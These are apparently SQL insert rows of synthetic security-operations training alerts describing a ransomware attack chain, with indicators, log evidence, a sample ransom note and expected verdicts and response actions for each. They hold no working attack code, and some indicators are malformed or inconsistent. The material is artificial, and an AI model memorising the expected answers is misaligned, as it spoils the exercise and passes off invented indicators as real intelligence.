(510, 'SMB Propagation Detected', 'high', 'Network Traffic Analysis', 'A potential lateral movement was detected on the network using the SMB protocol. An internal host is attempting to spread ransomware to other vulnerable machines within the network.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:22Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.23\",\"external_attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"malware_hash\":\"f2e9b8b5d5f3a2b1c4e6f7g8h9i0j1k2\",\"malware_filename\":\"ransomware_payload.exe\",\"username\":\"jdoe\",\"activity\":\"smb_connection_attempt\",\"status\":\"failed\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"internal\",\"details\":\"Potential source of lateral movement within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"internal\",\"details\":\"Potential target of lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used in previous ransomware attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f2e9b8b5d5f3a2b1c4e6f7g8h9i0j1k2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known ransomware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"malicious\",\"details\":\"Executable associated with ransomware propagation.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"suspicious\",\"details\":\"User potentially compromised for lateral movement activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(511, 'Kill-Switch Domain Investigated', 'high', 'DNS Query Logs', 'An investigation has identified suspicious DNS queries related to the WannaCry kill-switch mechanism. The queries originated from an internal host querying a known kill-switch domain, indicating potential infection or reconnaissance activity.', 'Command and Control', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:30Z\",\"source_ip\":\"192.168.1.105\",\"queried_domain\":\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"query_type\":\"A\",\"response\":\"92.242.132.24\",\"associated_filename\":\"wannacry.exe\",\"associated_hash\":\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\",\"internal_user\":\"jdoe\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_review\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known kill-switch domain for WannaCry ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with WannaCry ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"Executable known to be associated with WannaCry ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(512, 'Encryption Logic Analysis', 'high', 'File System Analysis', 'Analysts are examining the encryption logic of a ransomware strain to determine if there are any exploitable flaws that could allow decryption without payment. The analysis has identified several encrypted files and potential indicators of compromise.', 'Data Encryption', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"FS123456789\",\"user\":\"jdoe\",\"source_ip\":\"10.0.0.15\",\"attacker_ip\":\"203.0.113.45\",\"filename\":\"encrypted_document.docx\",\"malware_hash\":\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\",\"encryption_algorithm\":\"AES-256\",\"process\":\"ransomware.exe\",\"internal_network\":\"192.168.1.0/24\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a variant of ransomware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypted_document.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File is encrypted and cannot be opened without a decryption key.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee user account potentially impacted.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(513, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP) System', 'An advanced attempt to exfiltrate sensitive data was detected. Before encrypting files, the attacker tried to send critical company data to an external server.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:35Z\",\"event_type\":\"data_exfiltration_attempt\",\"src_ip\":\"192.168.1.105\",\"dest_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file\":\"financial_report_q3_2023.xlsx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"alert_id\":\"DLP-20231010-001\",\"message\":\"Sensitive data transfer attempt detected and blocked by DLP.\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address from company network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with data exfiltration campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Registered employee username.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Database\",\"verdict\":\"clean\",\"details\":\"Legitimate company file.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with suspicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(514, 'Ransom Note Deployment', 'high', 'User Reports', 'In the final step of the attack chain, the attacker deployed a ransom note to the affected systems, demanding payment in exchange for the decryption key. This action follows the encryption of critical files across multiple hosts.', 'Impact', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:00Z\",\"event_id\":\"1209\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"ransom_note_filename\":\"READ_ME.txt\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"message\":\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\",\"host\":\"victim-host-01\",\"malware_name\":\"Ryuk\"}', '2026-01-06 01:34:24', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for Ryuk ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host identified as victim\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Account used during the attack\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"READ_ME.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Standard ransom note file for Ryuk\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Ryuk ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
